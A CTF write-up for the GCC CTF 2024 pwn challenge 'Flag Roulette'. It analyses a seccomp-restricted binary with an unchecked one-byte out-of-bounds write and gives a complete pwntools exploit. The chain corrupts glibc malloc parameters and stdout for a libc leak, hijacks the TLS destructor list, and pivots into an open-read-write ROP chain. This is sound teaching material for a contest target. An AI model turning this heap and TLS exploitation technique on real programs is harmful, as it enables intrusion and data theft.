Contents

GCC CTF 2024

https://i.imgur.com/lEppMvR.png
GCC CTF 2024

I spent some of my free time to do the GCC CTF 2024. Below is my write-up for the last pwn challenge called Flag Roulette.

Pwn

Flag Roulette

Description

Are you tired of solving challs?

Here, have a little break. If we win my game, I will give you a flag.

I promise you I will not cheat :)

The flag is in the /flag file.

Author: 0xdeadbeef

Initial Analysis

In this challenge, we were provided a binary file named flag_roulette along with the supporting libraries libc, ld, and libseccomp. These libraries are essential for the binary’s execution. Let’s begin by examining the security mitigations implemented within the binary itself.

1
2
3
4
5
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

All security mitigations appear to be active, including the provision of the libseccomp file, indicating the application of a seccomp filter in the binary. Our next step involves attempting to dump this filter.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
seccomp-tools dump ./flag_roulette_patched
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x0b 0xc000003e  if (A != ARCH_X86_64) goto 0013
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x08 0xffffffff  if (A != 0xffffffff) goto 0013
 0005: 0x15 0x06 0x00 0x00000000  if (A == read) goto 0012
 0006: 0x15 0x05 0x00 0x00000001  if (A == write) goto 0012
 0007: 0x15 0x04 0x00 0x00000002  if (A == open) goto 0012
 0008: 0x15 0x03 0x00 0x00000003  if (A == close) goto 0012
 0009: 0x15 0x02 0x00 0x00000009  if (A == mmap) goto 0012
 0010: 0x15 0x01 0x00 0x0000000b  if (A == munmap) goto 0012
 0011: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0013
 0012: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0013: 0x06 0x00 0x00 0x00000000  return KILL

Our options for code execution are limited to the traditional open-read-write strategy. We proceed by disassembling the binary to examine its key functions.

main

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  char v3; // [rsp+Ch] [rbp-24h] BYREF
  char has_a_bet; // [rsp+Dh] [rbp-23h]
  char i; // [rsp+Eh] [rbp-22h]
  char v6; // [rsp+Fh] [rbp-21h]
  unsigned int v7; // [rsp+10h] [rbp-20h] BYREF
  unsigned int v8; // [rsp+14h] [rbp-1Ch] BYREF
  unsigned int j; // [rsp+18h] [rbp-18h]
  unsigned int k; // [rsp+1Ch] [rbp-14h]
  void *bet; // [rsp+20h] [rbp-10h]
  unsigned __int64 v12; // [rsp+28h] [rbp-8h]

  v12 = __readfsqword(0x28u);
  banner(argc, argv, envp);
  has_a_bet = 0;
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      i = 0;
      v6 = 0;
      for ( i = getchar(); i == 10; i = getchar() )
        ;
      while ( v6 != 10 )
        v6 = getchar();
      if ( i == '3' )
        break;
      if ( i <= '3' )
      {
        if ( i == '1' )
        {
          if ( has_a_bet == 1 )
          {
            puts("You already have a bet placed");
          }
          else
          {
            puts("How many bytes would you like to bet on ?");
            printf("> ");
            __isoc99_scanf("%ud", &v8);
            if ( (int)v8 > 127 )
            {
              if ( (int)v8 <= 135168 )
              {
                bet = malloc((int)v8);
                for ( j = 0; j < v8; ++j )
                {
                  do
                  {
                    do
                      *((_BYTE *)bet + j) = rand();
                    while ( *((char *)bet + j) <= 31 );
                  }
                  while ( *((_BYTE *)bet + j) == 127 );
                }
                puts("Random pattern generated successfully");
                puts("\nAs a sign of good will, we will let you modify set exactly one byte in this sea of randomness");
                puts("Please choose the index of the byte to modify");
                printf("> ");
                __isoc99_scanf("%ud", &v7);
                puts("Please set the new value of this byte");
                printf("> ");
                __isoc99_scanf("%ud", &v3);
                *((_BYTE *)bet + v7) = v3;
                puts("Modification successful");
                has_a_bet = 1;
              }
              else
              {
                puts("Come on, you cannot be THAT lucky ;)");
              }
            }
            else
            {
              puts("Not enough bytes");
              puts("The bet is not risky enough");
            }
          }
        }
        else if ( i == '2' )
        {
          if ( has_a_bet )
          {
            free(bet);
            bet = 0LL;
            puts("Bet successfully deleted");
            has_a_bet = 0;
          }
          else
          {
            puts("You have no bet placed");
          }
        }
      }
    }
    if ( has_a_bet )
      break;
    puts("You have not placed a bet !");
  }
  printf("Your bet : %s\n", (const char *)bet);
  for ( k = 0; k < v8; k += 3 )
  {
    if ( *((_BYTE *)bet + k) != 71 )
      lose();
    if ( *((_BYTE *)bet + k + 1) != 67 )
      lose();
    if ( *((_BYTE *)bet + k + 2) != 67 )
      lose();
  }
  win();
}

Within this function, we find three interactive menus:

  • Place a bet
  • Delete a bet
  • Spin the roulette

Focusing on each menu, we start with the first. This menu checks if a bet has been placed using the has_a_bet variable. If no bet is detected, it prompts for the size of the bet, accepting sizes within the range 0x80 to 0x21000. This size parameter is used in a call to malloc, and the allocated memory is then filled with random values. Additionally, the menu offers an option to modify one byte within the allocated chunk, with no bounds checking implemented. This oversight introduces a relative out-of-bound write vulnerability, exploitable as long as the offset remains within the unsigned int maximum value. Understanding this flaw, we temporarily shift our focus from this menu.

The second menu’s functionality is straightforward: it frees the previously allocated chunk. Similarly, the third menu simply displays the bet before invoking exit.

After scrutinizing the main functions and their behaviors, we should now strategize on exploiting the identified vulnerability to achieve code execution.

Solution

Summarizing our progress:

  • Allocation of a chunk is possible within the size range from 0x80 to 0x21000.
  • Only a single chunk can be active at any given time.
  • The ability to free the currently active chunk is available.
  • Execution of an exit command is permitted.

Typically, in exploiting such scenarios, the initial step involves obtaining a memory leak. Following this, we strategize on utilizing the leak to facilitate code execution.

Getting libc leak

In order to achieve code execution, the first step is figuring out how to get a leak. It’s noteworthy that the largest chunk size we can allocate is significantly large, more than 0x20000. Looking into how malloc works, there’s a detail where, if the requested size is large (exceeding the mp_.mmap_threshold, which defaults to 128*1024 = 0x20000), it uses mmap instead of placing the chunk in the heap.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
...
DEFAULT_MMAP_THRESHOLD     128 * 1024
...
static struct malloc_par mp_ =
{
...
  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
...
};
...
static void *
sysmalloc (INTERNAL_SIZE_T nb, mstate av)
{
...
  /*
     If have mmap, and the request size meets the mmap threshold, and
     the system supports mmap, and there are few enough currently
     allocated mmapped regions, try to directly map this request
     rather than expanding top.
   */

  if (av == NULL
      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
    {
      char *mm;
#if HAVE_TUNABLES
      if (mp_.hp_pagesize > 0 && nb >= mp_.hp_pagesize)
	{
	  /* There is no need to isse the THP madvise call if Huge Pages are
	     used directly.  */
	  mm = sysmalloc_mmap (nb, mp_.hp_pagesize, mp_.hp_flags, av);
	  if (mm != MAP_FAILED)
	    return mm;
	}
#endif
      mm = sysmalloc_mmap (nb, pagesize, 0, av);
      if (mm != MAP_FAILED)
	return mm;
      tried_mmap = true;
    }
...
}

Let’s examine the heap memory layout when we execute malloc(0x21000).

1
2
3
4
5
6
7
gef> vmmap
...
0x00007ffff7d8c000 0x00007ffff7db1000 0x0000000000025000 0x0000000000000000 rw- <tls-th1>
...
gef> x/20gx 0x00007ffff7d8c000
0x7ffff7d8c000: 0x0000000000000000      0x0000000000022002
0x7ffff7d8c010: 0x45793d7536367100      0x703d5e772852523b

You’ll notice that the chunk is positioned near the tls and libc areas. This means that by calling malloc(0x21000), this kind of setup allows us to overwrite one-byte at any writable address within the tls and libc regions.

But what if we want to write more? The first idea might be to free the chunk and then call malloc again. However, trying this initially leads to an error as follows.

1
2
3
How many bytes would you like to bet on ?
> 135168
[1]    58259 invalid system call  ./flag_roulette_patched

Using strace, we found a brk syscall, showing us that our attempt to use malloc didn’t trigger mmap as we expected.

1
2
3
brk(0x55bf6fa19000)                     = 0xc
+++ killed by SIGSYS +++
[1]    58515 invalid system call  strace ./flag_roulette_patched

Digging into why this happened, we looked at how free works and discovered something interesting. When you free a chunk that was allocated with mmap, it changes the mp_.mmap_threshold to the size of the chunk you just freed. So, our next malloc(0x21000) didn’t use mmap because, according to the new threshold, 0x21000 wasn’t big enough.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
void
__libc_free (void *mem)
{
...
  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
    {
      /* See if the dynamic brk/mmap threshold needs adjusting.
	 Dumped fake mmapped chunks do not affect the threshold.  */
      if (!mp_.no_dyn_threshold
          && chunksize_nomask (p) > mp_.mmap_threshold
          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX)
        {
          mp_.mmap_threshold = chunksize (p);
          mp_.trim_threshold = 2 * mp_.mmap_threshold;
          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
                      mp_.mmap_threshold, mp_.trim_threshold);
        }
      munmap_chunk (p);
    }
...
}

To get around this, we need a good strategy. We noticed something in the __libc_free function: it only changes the mp_.mmap_threshold if mp_.no_dyn_threshold is 0 (false). We still have a one-byte out-of-bounds (OOB) write ability from when we allocated our chunk, and this offset from the libc area doesn’t change. This means we can tweak the mp_.no_dyn_threshold to 1 (true). Doing this means the threshold won’t change when we free a chunk, allowing us to do as many OOB writes to the tls and libc areas as we want. This works because our malloc(0x21000) will always use mmap, placing the chunk right before the tls and libc areas.

Now that we have the power to write out of bounds to tls and libc without limits, we can leak the libc address. The trick is to mess with stdout: change stdout->flags to 0x1800 and make stdout->_IO_write_ptr bigger than stdout->_IO_write_base. The next time we use puts(), it’ll spit out data from _IO_write_base to _IO_write_ptr, giving us the libc leak we need to move forward.

Stack Pivot via TLS DTOR

To achieve remote code execution, given the program terminates with exit, a common approach is to hijack the tls_dtor_list with a custom fake structure. This way, when __run_exit_handlers triggers __call_tls_dtors, it processes our crafted structure, allowing us a controlled call with the first argument in our hands.

However, this isn’t enough because there is seccomp, which limit our action to do the open-read-write of the flag file. So, I was thinking that we need to somehow do ROP, which mean we need to be able to do stack pivoting. After looking through all the available gadgets, I found one very good gadget

1
0x00099ab4: mov rbp, [rsi+8]; mov rax, [rbx+0x40]; test byte ptr [rbx+0x50], 1; jne short 0x99a98; mov rdi, rsi; call rax;

This gadget is perfect for our needs because we found out that we can control both the [rsi+8] and rbx values. Here’s how it works in the context of our fake dtor_list:

  • rbx will point to the address of our crafted fake dtor_list.
  • rsi points to __exit_funcs, part of the libc area, allowing us to overwrite this section.

With these controls in place, the path to exploitation becomes quite clear. Here’s a simple walkthrough of what I did to make it work:

  • Make PTR_MANGLE zero to simplify creating our fake dtor_list.
  • Store /flag string in the tls area. We know its exact location thanks to its fixed distance from the libc base.
  • Change the tls_dtor_list (found at tls_base-0x50) to point to our fake dtor_list.
  • Now, at the address we’ve set in the tls_dtor_list, we create our fake dtor_list. The key move here is:
    • Set dtor_list->func to pivot_stack_gadget<<17.
  • Modify [rsi+0x8] (which corresponds to __exit_funcs+0x8) to point towards our ROP chain (location-0x8). This is essential for our stack pivot maneuver using leave ; ret, which essentially does mov rsp, rbp ; pop rbp ; ret.
  • Place the leave ; ret; gadget’s address at [rbx+0x40] (fake_dtor_list+0x40). Our stack pivot gadget will execute call rax, with rax coming from this address.
  • To avoid the jne jump in our gadget’s flow, set [rbx+0x50] to 0.
  • Fill in our ROP chain at the address we’ve set up in __exit_funcs+0x8.
  • Trigger the exit mechanism to set everything into motion.

By following these steps, we manage to get the flag. Below, you’ll find my solver script with detailed comment.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
from pwn import *

exe = ELF("flag_roulette_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

context.binary = exe
context.arch = 'amd64'
context.encoding = 'latin'
context.log_level = 'INFO'
context.terminal = ['wezterm', 'cli', 'split-pane', '--top', '--percent', '70']
warnings.simplefilter("ignore")

remote_url = "worker01.gcc-ctf.com"
remote_port = 10873
gdbscript = '''
b malloc.c:3352
'''
gdbscript = 'b *__call_tls_dtors'

def conn():
    if args.LOCAL:
        r = process([exe.path])
        if args.PLT_DEBUG:
            gdb.attach(r, gdbscript=gdbscript)
            pause()
    else:
        r = remote(remote_url, remote_port)

    return r

def demangle(val, is_heap_base=False):
    if not is_heap_base:
        mask = 0xfff << 52
        while mask:
            v = val & mask
            val ^= (v >> 12)
            mask >>= 12
        return val
    return val << 12

def mangle(heap_addr, val):
    return (heap_addr >> 12) ^ val

r = conn()
menu_delim = b'> '
def logleak(name, val):  info(name+' = %#x' % val)
def sa(delim,data): return r.sendafter(delim,data)
def sla(delim,line): return r.sendlineafter(delim,line)
def sl(line): return r.sendline(line)
def so(data): return r.send(data)
def sn(num): return str(num).encode()
def menu(num): return sla(menu_delim, sn(num))

def place(sz, offset, val):
    menu(1)
    sla(b'> ', sn(sz))
    sla(b'> ', sn(offset))
    sla(b'> ', sn(val))

def free():
    menu(2)

def win():
    menu(3)

# Default mp_.mmap_threshold is 0x20000
# Calling malloc(0x21000) will trigger mmap
# With the OOB relative write, we can overwrite mp_.no_dyn_threshold to 0x1
place(0x21000, 0x1f8398, 0x1)
# Due to we overwrite mp_.no_dyn_threshold, free won't overwrite mp_.mmap_threshold to the current freed chunk size.
free()
# Now, everytime we call malloc(0x21000), the nb always larger than the mmap_threshold (which is remains 0x20000 due to previous overwrite).
# So now, we can always trigger mmap via malloc :)

# With the OOB relative write from the mmapped address (which placed before tls and libc area),
# we basically has unlimited one byte overwrite (with limit that the offset is unsigned int).
def rel_write(offset, val):
    place(0x21000, offset, val)
    free()

def rel_write_8(offset, val):
    for i in range(8):
        rel_write(offset+i, p64(val)[i])

'''
LIBC LEAK
'''
# Overwrite stdout to get leak
# Overwrite flags to 0x1800
rel_write(0x1f9770, 0x00)
rel_write(0x1f9771, 0x18)
rel_write(0x1f9772, 0x00)
rel_write(0x1f9773, 0x00)

# Overwrite _IO_write_ptr last byte to 0x10
place(0x21000, 0x1f9798, 0x10)
# After overwriting, the next puts() will print data from _IO_write_base _IO_write_ptr
# (which contains _IO_stdfile_1_lock address)
r.recv(5)
leaked_libc = u64(r.recv(6).ljust(8, b'\x00'))
logleak('leaked_libc', leaked_libc)
libc.address =  leaked_libc - libc.symbols['_IO_stdfile_1_lock']
logleak('libc.address', libc.address)
free()

'''
STACK PIVOT via TLS DTOR
'''
# Overwrite mangle pointer to 0
tls_base = libc.address-0x28c0
tls_base_offset = 0x22730
logleak('tls_base', tls_base)
rel_write_8(tls_base_offset+0x30, 0x0)
rel_write(tls_base_offset+0x30, 0x0) # I don't know why...

# Write /flag
info("Writing /flag...")
flag_pos = tls_base+0x50
flag_off = tls_base_offset+0x50
rel_write_8(flag_off, u64(b'/flag\x00\x00\x00'))

# Overwrite tls_dtor_list with tls_base+0x60
info("Writing tls_dtor_list...")
tls_dtor_list = tls_base-0x50
tls_dtor_list_off = tls_base_offset-0x50
curr_dtor = tls_base+0x60 # rbx
rel_write_8(tls_dtor_list_off, curr_dtor) # First entry of dtor_list

# Overwrite dtor with pivot stack gadget
info("Writing pivot_stack_gadget...")
pivot_stack_gadget = libc.address+0x00099ab4 # mov rbp, [rsi+8]; mov rax, [rbx+0x40]; test byte ptr [rbx+0x50], 1; jne short 0x99a98; mov rdi, rsi; call rax;
curr_dtor_off = tls_base_offset+0x60
rel_write_8(curr_dtor_off, pivot_stack_gadget<<17) # func

# Observation in gdb, rsi pointing to __exit_funcs
# Overwrite __exit_funcs+0x8 ([rsi+0x8]) with target rbp
info("Writing __exit_funcs+0x8...")
rel_write_8(0x1f8838, tls_base+0x100)

# Overwrite [rbx+0x40] (which is curr_dtor+0x40) with leave
info("Writing curr_dtor+0x40...")
leave_ret = libc.address+0x00141a03
rel_write_8(curr_dtor_off+0x40, leave_ret)

# Overwrite [rbx+0x50] with 0
info("Writing curr_dtor+0x50...")
rel_write(curr_dtor_off+0x50, 0x0)

# Fill in ROP open read write starting from rbp+0x8 (tls_base+0x108)
info("Writing ROPChain...")
pop_rdi = libc.address+0x0017964f
pop_rsi = libc.address+0x0014f520
pop_rdx = libc.address+0x000fd76d
syscall = libc.address+0x00121f57
pop_rax = libc.address+0x0013fcf4
xchg_rdi_rax = libc.address+0x00169b4d
ropchain = [
    # open("flag.txt", 0, 0)
    pop_rdi,
    flag_pos,
    pop_rsi,
    0,
    pop_rdx,
    0,
    pop_rax,
    2,
    syscall,

    # read(3, flag_pos, 0x100)
    xchg_rdi_rax,
    pop_rsi,
    flag_pos,
    pop_rdx,
    0x100,
    libc.sym.read,

    # puts(flag_pos)
    pop_rdi,
    flag_pos,
    libc.sym.puts,
]
rop_off = tls_base_offset+0x108
for i, num in enumerate(ropchain):
    rel_write_8(rop_off+(i*8), num)

'''
EXIT AND WIN
'''
info("Win...")
place(0x200, 0, 0) # Place random bet
win() # exit :)

r.interactive()

Flag: GCC{Th0s3_p0in7S_R_w3lL_deS3rvEd_Gig4ch4d}

Social Media

Follow me on twitter